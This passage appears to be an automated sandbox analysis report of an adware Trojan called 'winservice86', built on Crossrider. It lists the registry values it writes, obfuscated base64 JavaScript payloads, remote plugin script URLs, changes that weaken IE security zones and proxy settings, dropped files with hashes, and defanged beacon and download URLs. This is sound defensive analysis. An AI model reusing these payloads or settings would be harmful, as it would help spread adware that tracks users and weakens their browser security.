    "Name" = "price_gong_m"

    [HKCU\Software\winservice86\Installer]
    "zdata" = "0"

    [HKCU\Software\winservice86\Plugins\311]
    "Version" = "4"

    [HKCU\Software\winservice86\Plugins\43]
    "Name" = "IEMessaging"

    [HKCU\Software\winservice86\Plugins\288]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2NzVhNWE1NDQ1NTMxYjE5MTcxNTM4MDgxNjU2NWY1MTUxMDUxNzExMWQ0MDU1NWIwYzAyMDcwYzE3MGMwZTU0MWYwNzBkMWUwMzBlMGMwODFkNTQxOTFiMDg1ZTE1MDI0YzA4MDQxNDU1MTcxNzAwMTA0MzA5MTY1MjEyMTMxMDU4MmUyYzJlMzEyYTNlMjkyODNkMjEzNDIxMzIzNjM2MjgyODI1M2QyMTJlMmM0YjAxMGIwYzE3MWY0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMmMzMzM1MzIzNDNiMzkyMDJlMmM0YjEwMTAwZjEzMWU0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMjgzYjMxMjgzNDNlMzEyMTJlMjAzODIxM2EyNDNlMjUyYjQ3NWQ3OTRkNDM0NTRkNTgxMjAwMTEwMTAwMzgxMTA5NGY0MDVhNTYwZDA1MDcxZDEwNWY0MjU1MTMwNzExMTAwNzA0MDA0YjA4MDkxMjFiMTUxMjFjMDAxMzRiMGUxNTE3NWIwMzFlNWMwMDBhMGI0MjE5MDgwNTA2NWYxOTFlNWMwZDA0MWU0NzJiM2EzMjIxMjIzMDM2M2YzMzNlMzEzNzJlMjYzZTI2MzczMjMzM2UyYjNhNTcxMTAzMDIwODA4NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTMwMjMzZDNjMmIyYzM3M2YyYjNhNTcwMDE4MDEwYzA5NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTM0MmIzOTI2MmIyOTNmM2UyYjM2MjQzMTMyMmEyMTMyMjU1ODU4NmY1MTUzNGQ0MzQ3MWQxNjBmMTMwYzFmM2EwOTQxNWY0ZDQ4NDI0YzZmMGM=', 'emzzteqsmc'); }"

    [HKCU\Software\winservice86\Plugins\44]
    "Version" = "6"

    [HKCU\Software\winservice86\Plugins]
    "NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\winservice86\Plugins\288]
    "Name" = "firstoffer_pricecomp_m"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKLM\System\CurrentControlSet\Control\Session Manager]
    "PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl3.tmp\extensionData\,"

    [HKCU\Software\winservice86\Plugins\128]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/128.js"

    [HKCU\Software\winservice86\Plugins\91]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/91.js"

    [HKCU\Software\winservice86\Plugins\221]
    "Name" = "icm_downloads_m"

    [HKCU\Software\winservice86\Plugins\43]
    "Version" = "5"

    [HKCU\Software\winservice86\Installer]
    "FullVersionForUrl" = "1_35_09_29"

    [HKCU\Software\winservice86\Code]
    "AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { // Place your code here (you can also define new functions above this scope) // The $ object is the extension's jQuery object // alert(My new Crossrider extension works! The current page is: document.location.href);});"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "CrAppId" = "64755"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\winservice86\Plugins\253]
    "Version" = "2"

    [HKCU\Software\winservice86\Plugins\64]
    "Version" = "3"

    [HKCU\Software\winservice86\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\winservice86\Plugins\36]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve "

    [HKCU\Software\winservice86\Plugins\193]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/193.js"

    [HKCU\Software\winservice86\Plugins\91]
    "Name" = "monetizationLoader.js"

    [HKCU\Software\winservice86\Plugins\195]
    "Name" = "icm_convertmedia_m"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "CF AF 19 13 6E D9 43 A2 1F 03 EB 80 2E B4 B6 BE"

    [HKCU\Software\InstalledBrowserExtensions\17638]
    "64755" = "winservice86"

    [HKCU\Software\winservice86\Plugins\269]
    "Version" = "1"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\17638]
    "64755" = "winservice86"

    [HKLM\SOFTWARE\winservice86\IE\Profiles]
    "S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\winservice86\Manifest]
    "BgVersion" = "1"

    [HKCU\Software\winservice86\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,47,94"

    [HKCU\Software\winservice86\Plugins\354]
    "Name" = "categories"

    [HKCU\Software\winservice86\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKCU\Software\winservice86\Plugins\17]
    "Version" = "4"

    [HKCU\Software\winservice86\Plugins\262]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/262.js"

    [HKCU\Software\winservice86\Plugins\37]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/37.js"

    [HKCU\Software\winservice86\Plugins\288]
    "URL" = "http://js.newcloudrack.com/plugins/mins/288.js"

    [HKCU\Software\winservice86\Plugins\2]
    "Name" = "ie8_fix_1"

    [HKCU\Software\winservice86\Plugins\42]
    "JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;Ç‘"

    [HKCU\Software\winservice86\Plugins\354]
    "URL" = "http://js.newcloudrack.com/plugins/mins/354.js"

    [HKCU\Software\winservice86\Plugins\38]
    "Version" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "UninstallString" = "%Program Files%\winservice86\Uninstall.exe /fcp=1"

    [HKCU\Software\winservice86\Plugins\262]
    "Name" = "pops_5_j_m"

    [HKCU\Software\winservice86\Plugins\37]
    "Version" = "6"

    [HKCU\Software\winservice86\Installer]
    "Params" = "{ source_id : 002201, sub_id : 0, uzid : 0"

    [HKCU\Software\winservice86\Plugins\275]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg2MzcwNGUwNDA1MTExYTM2MDExZjRiNDM0YzRlMTkxMTFlMTM0OTVjNDYwZTFmNDIwMTE3MDMwMDE2MTcwYzBkMDkwZjA1NGIwOTBjMWU1YzFhNTYxYzA4MWIxNjVmNTA0YTRiNWIxODVmNWM0MDUzMDg1NDExNWQwMzBhNTMxZjE4MDE1NzNjMmMzMDNiMzYzZjNmMjMyYzJlMjYyMTJjMmMyMTM4MjkzZjIxMmYyNzJjMjAzYzNiMzMyNTM1M2EzNTQ1MTIwMzE5MTcwZDAxMTQ1ODM1M2MzMDIxMjYyYTNmM2UzODIxMmYzMTJjMzIzOTI5MzMyMjMwMjgyZjNjMmM1MTQ1NzM2NTRlMTkxMTFlMTMwMDI2MWIxNTRlNTY1MTQ3MDIxNzA3MDMxYTQzNDM0MzA2MTY0NDEzMDExYTBhMWMwODA5MDUwMDA5MTc1ZDEwMDYxNDQzMWY1ZTE1MGUwOTAwNDY1YTQwNTQ1ZTEwNTY1YTUyNDUxMTVlMWI0MjA2MDI1YTE5MGExNzRlMzYyNjJmM2UzZTM2MzkzMTNhMzcyYzJiMzMyOTI5MzEyZjJkMzczNjJkMjYzZjM5MzMzYTIzMjcyYzJjNGYxODFjMWMxZjA0MDcwNjRlMmMzNjNhM2UyMzIyMzYzODJhMzczNjNiMjYyZDNjMjEzYTI0MjIzZTM2MzYyNjRlNDA3YjZjNDgxMzFmMDYwZTEwMDIyNTE1NDc1MDQzNDE0NDVjNzMxMQ==', 'siyllqejcs'); }"

    [HKCU\Software\winservice86\Plugins\391]
    "Name" = "50intext_new_m"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

    [HKCU\Software\winservice86\Plugins\200]
    "URL" = "http://js.newcloudrack.com/plugins/mins/200.js"

    [HKCU\Software\winservice86\Plugins]
    "BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,47,269,93,102,104,128,180,184,193,220,195,221,223,230,242,262,263,273,275,289,91"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
    "DisplayVersion" = "1.35.9.29"

    [HKCU\Software\winservice86\Plugins\269]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2ZjYzNTExZjFmMWMxMjNhMDIxODQ3NTA1MzU1MDMxYzE2MWY0YTViNGExYTBiNTkwNjExMDMwYzA0MWQxMzBmMDAwMzBhMWMxMTQxMTMxYjA4NDUxMjE0MWYwMTE0MGE1ZjFkMDA0NDE5MDQ1NDFhMGMwYjRkMmIzYTM4M2QzMzM0Mzc0MDQzN2E3ZDQ3MDIwNzAzMWIxYjM3MWQxYzU2NWY0YTUxMWYxZjFjMTIxYzRhNWI0YTA4NDAxOTUzMDY1MTAxNDI1YTE2MTkxZjU5MDMxZjAxMGIxZTVhMGIwZjA3NTgwYTBiMTYwNjA2MTE0YTAzMTY1OTAxMWI1ZDFkMWUxMDU4MzUyYzI1MjUyYzNkMzA1MjU4NmY2MzUxMDcwNzFkMDUwNjFlM2QwMTQ4NDk1NzU5NWU1YjY1MGQ=', 'tejswkhbop'); }"

    [HKCU\Software\winservice86\Plugins\180]
    "Name" = "bpo_serp_m"

    [HKCU\Software\winservice86\Plugins\35]
    "Version" = "4"

    [HKCU\Software\winservice86\Plugins\46]
    "Name" = "IETimers"

    [HKCU\Software\winservice86\Plugins\289]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2ZjQyNTQ1MzU0NDgwNDAwMTUwNjMwMTAxODUxNGU0YTRlMWMxNTAyMTU1ODViNWMxNTQ0MTQxMjEzMTMwMDExMTEwMTAyMDMwZjExNGYxNTBhMGY1YjAzMTUxODE4MWEwNDA0NGEwZjFkMWY0NjNjNWMyMzEyNTk1YTAxMWQxNzQ5NTk1YjUyMTIxZjAxNWYyYjJjMzczODIzMjczMjI0MmMyNjMxMjEyYjJmMzQyMDI0MzgyMTI3MzAyYzI3M2YyZTJiMjgzMjNhM2Q1MjEyMTAwZTJmMzY1YzQ3NDMwMzA0MDMwMDAzMTgxODA0NGIzYTNkMzcyMTNiMzkzZjI2MjgzMjIwMzAyYjMyMjQzYTMzM2EyMDNiMjAzZDJiNTE1ODYwNGM1NDQxNTY0NzBhMDAwNzA0MTkzOTA2MGQ1NDVmNDI1NjFiMDAxZTFjMDc1YjU5NGEwMzVhMGIxMjE4MDkxMTEyMTMxNzE0MWQxMDExNDQwZjFiMGM1OTE1MDMwNjA3MWEwZjFlNWIwYzFmMDk1MDIyNDMyMzE5NDM0YjAyMWYwMTVmNDc0NDUyMTkwNTEwNWMyOTNhMjEyNjNjMjczOTNlM2QyNTMzMzczZDMxMmIyMDJmMjIzMDI0MzIzYTMxMjEzMTJiMjMyODJiM2U1MDA0MDYxMDMwMzY1NzVkNTIwMDA2MTUxNjFkMDcxODBmNTEyYjNlMzUzNzJkMjcyMDI2MjMyODMxMzMyOTI0MzIyNDJjM2EyYjIxMzEzZTI5NDc0ZTdlNTM1NDRhNGM1NjExMWExMDA1MWQxZDNkMGU0ZTRlNDE0NDVkNWI3ZTBl', 'vebtstjlta'); }"

    [HKCU\Software\winservice86\Plugins\3]
    "Version" = "2"

    [HKCU\Software\winservice86\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
    "winservice86-bg.exe" = "8000"

    [HKCU\Software\winservice86\Plugins]
    "AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,7,9,93,102,104,128,180,184,193,220,195,221,223,230,242,262,263,273,275,289,91"

    [HKCU\Software\winservice86\Plugins\13]
    "URL" = "http://js.newdemoonlinecloud.com/plugins/mins/13.js"

    [HKCU\Software\winservice86\Plugins\7]
    "Version" = "2"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass" = "1"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    "IntranetName" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan deletes the following registry key(s):

    [HKCU\Software\winservice86\Plugins\39]
    [HKCU\Software\winservice86\Plugins\38]
    [HKCU\Software\winservice86\Plugins\195]
    [HKCU\Software\winservice86\Plugins\94]
    [HKCU\Software\winservice86\Plugins\193]
    [HKCU\Software\winservice86\Plugins\35]
    [HKCU\Software\winservice86\Plugins\78]
    [HKCU\Software\winservice86\Plugins\37]
    [HKCU\Software\winservice86\Plugins\36]
    [HKCU\Software\winservice86\Plugins\221]
    [HKCU\Software\winservice86\Plugins\220]
    [HKCU\Software\winservice86\Plugins\223]
    [HKCU\Software\winservice86\Plugins\7]
    [HKCU\Software\winservice86\Plugins\242]
    [HKCU\Software\winservice86\Plugins\4]
    [HKCU\Software\winservice86\Plugins\9]
    [HKCU\Software\winservice86\Plugins\102]
    [HKCU\Software\winservice86\Plugins\104]
    [HKCU\Software\winservice86\Plugins\275]
    [HKCU\Software\winservice86\Plugins\93]
    [HKCU\Software\winservice86\Plugins\273]
    [HKCU\Software\winservice86\Plugins\128]
    [HKCU\Software\winservice86\Plugins\17]
    [HKCU\Software\winservice86\Plugins\14]
    [HKCU\Software\winservice86\Plugins\13]
    [HKCU\Software\winservice86\Plugins\64]
    [HKCU\Software\winservice86\Plugins\44]
    [HKCU\Software\winservice86\Plugins\45]
    [HKCU\Software\winservice86\Plugins\46]
    [HKCU\Software\winservice86\Plugins\47]
    [HKCU\Software\winservice86\Plugins\40]
    [HKCU\Software\winservice86\Plugins\41]
    [HKCU\Software\winservice86\Plugins\42]
    [HKCU\Software\winservice86\Plugins\43]
    [HKCU\Software\winservice86\Plugins\230]
    [HKCU\Software\winservice86\Plugins\2]
    [HKCU\Software\winservice86\Plugins\180]
    [HKCU\Software\winservice86\Plugins]
    [HKCU\Software\winservice86\Plugins\184]
    [HKLM\SOFTWARE\Tempo]
    [HKCU\Software\winservice86\Plugins\3]
    [HKCU\Software\winservice86\Plugins\269]
    [HKCU\Software\winservice86\Plugins\246]
    [HKCU\Software\winservice86\Plugins\91]
    [HKCU\Software\winservice86\Plugins\289]
    [HKCU\Software\winservice86\Plugins\263]
    [HKCU\Software\winservice86\Plugins\262]

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process 0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "D4 6C 4D 87 58 83 77 EF FB 92 B7 FB BE 3A 32 6B"

    Dropped PE files

    MD5 File path
    03114dadbd9977fc823f95b21fb987e7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe
    d858ba2ee718b1db1ced20646e641d08 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdate.exe
    f98de4108614e4bb81e95e58e36c7000 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe
    7e767b342e55eb1dfd74a65d24ea4b70 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe
    a608387077284a570bb8a063575e3ca3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\goopdate.dll
    8aa4451ed8a9bc44505c6bab7ab92094 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\goopdateres_en.dll
    4f6d8d7cdeb95bc4d4fa946a3195e657 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll
    fefef2f226fd6be184bc4a3378b02aaf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\psmachine.dll
    8d90bb3a36521b50d0e512a781e36871 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\psuser.dll
    03114dadbd9977fc823f95b21fb987e7 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe
    d858ba2ee718b1db1ced20646e641d08 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe
    f98de4108614e4bb81e95e58e36c7000 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe
    7e767b342e55eb1dfd74a65d24ea4b70 c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe
    a608387077284a570bb8a063575e3ca3 c:\Program Files\globalUpdate\Update\1.3.25.0\goopdate.dll
    8aa4451ed8a9bc44505c6bab7ab92094 c:\Program Files\globalUpdate\Update\1.3.25.0\goopdateres_en.dll
    4f6d8d7cdeb95bc4d4fa946a3195e657 c:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll
    fefef2f226fd6be184bc4a3378b02aaf c:\Program Files\globalUpdate\Update\1.3.25.0\psmachine.dll
    8d90bb3a36521b50d0e512a781e36871 c:\Program Files\globalUpdate\Update\1.3.25.0\psuser.dll
    d858ba2ee718b1db1ced20646e641d08 c:\Program Files\globalUpdate\Update\GoogleUpdate.exe
    2c523048ebd358d626fb8bd7b1ad571a c:\Program Files\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe
    5b833b50e9d596b0d3ce325136c0c4fb c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe
    34b74aa995e73bdd4b9d5060a6855615 c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe
    e88ccd8a681b1a12eb53483303dc7692 c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe
    6371f0c089ae8fc66b873ec8bb9dc5d2 c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe
    ebf09dc278d70dc6d2ab6f0aec4288b1 c:\Program Files\winservice86\Interop.IWshRuntimeLibrary.dll
    3a77e9571d9f8748fc5abe0c83f6ec80 c:\Program Files\winservice86\Newtonsoft.Json.dll
    740ff202a16e18783b38287c16c8d5d8 c:\Program Files\winservice86\SuperSocket.ClientEngine.Common.dll
    ba883ea86ba520ba129a014f280b1c57 c:\Program Files\winservice86\SuperSocket.ClientEngine.Core.dll
    de9ace1ad7558a73df25f03c445e779b c:\Program Files\winservice86\SuperSocket.ClientEngine.Protocol.dll
    5c71031021e9b22bd1f2e1696dec7a76 c:\Program Files\winservice86\Uninstall.exe
    697c4fdb5abb4e3f19c2c22a5e2ae5a0 c:\Program Files\winservice86\WebSocket4Net.dll
    3b22b7f149c6bcdb89c2c9d0305aa4ba c:\Program Files\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe
    df7add30d0339c1c12c82d597bf527e8 c:\Program Files\winservice86\utils.exe
    2a0e8b0b7075ec87e183337da98ada72 c:\Program Files\winservice86\winservice86-bg.exe
    682b4c256af1c16ab3bb4e4ab48adcbe c:\Program Files\winservice86\winservice86-bho.dll
    ffc4214f7d095fb806cdb4240ae620f9 c:\Program Files\winservice86\winservice86-codedownloader.exe

    HOSTS file anomalies

    No changes have been detected.

    Rootkit activity

    No anomalies have been detected.

    Propagation

    • VersionInfo

    Company Name:
    Product Name:
    Product Version:
    Legal Copyright:
    Legal Trademarks:
    Original Filename:
    Internal Name:
    File Version: 1.35.9.29
    File Description:
    Comments:
    Language: English (United States)

    PE Sections

    Name Virtual Address Virtual Size Raw Size Entropy Section MD5
    .text 4096 34880 35328 4.13209 c061a4f004f4d6347691f4655fa02103
    .data 40960 140 512 0.818128 a5a710a52d844b19513b2cab5693dbc3
    .rdata 45056 9108 9216 4.0908 004265d16597098398ce8e06897dcd29
    .bss 57344 252880 0 0 d41d8cd98f00b204e9800998ecf8427e
    .idata 311296 4868 5120 3.64756 20f692042b54593897a705a64d67ce50
    .ndata 319488 8765440 8192 0 0829f71740aab1ab98b33eae21dee122
    .rsrc 9084928 12440 12800 2.0553 715d118c4337fd84e426a690557b0baa

    Dropped from:

    Downloaded by:

    Similar by SSDeep:

    Similar by Lavasoft Polymorphic Checker:

    URLs

    URL IP
    hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/002201/update.json
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=1456422018
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=1456422014
    hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
    hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    hxxp://e6845.dscb1.akamaiedge.net/ThawteTimestampingCA.crl
    hxxp://e6845.dscb1.akamaiedge.net/tss-ca-g2.crl
    hxxp://crl.usertrust.com/UTN-USERFirst-Object.crl 178.255.83.2
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=15720
    hxxp://crl.comodoca.com.cdn.cloudflare.net/COMODOCodeSigningCA2.crl 104.16.89.188
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=3029
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=6315
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=9830
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=5028
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/390.js?ver=1&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/424.js?ver=3&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/391.js?ver=1&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/223.js?ver=9&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/200.js?ver=6&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/273.js?ver=6&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/288.js?ver=4&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/311.js?ver=4&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/339.js?ver=3&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/380.js?ver=1&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/220.js?ver=46&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/184.js?ver=11&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/180.js?ver=20&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/102.js?ver=15&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/91.js?ver=186&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/376.js?ver=12&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/354.js?ver=2&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/345.js?ver=47&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/253.js?ver=2&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/246.js?ver=17&rnd=8467
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=8700
    hxxp://fallback.global-ssl.fastly.net/download/66/60001/DNSUnlocker/setup.exe
    hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=3481
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=1461
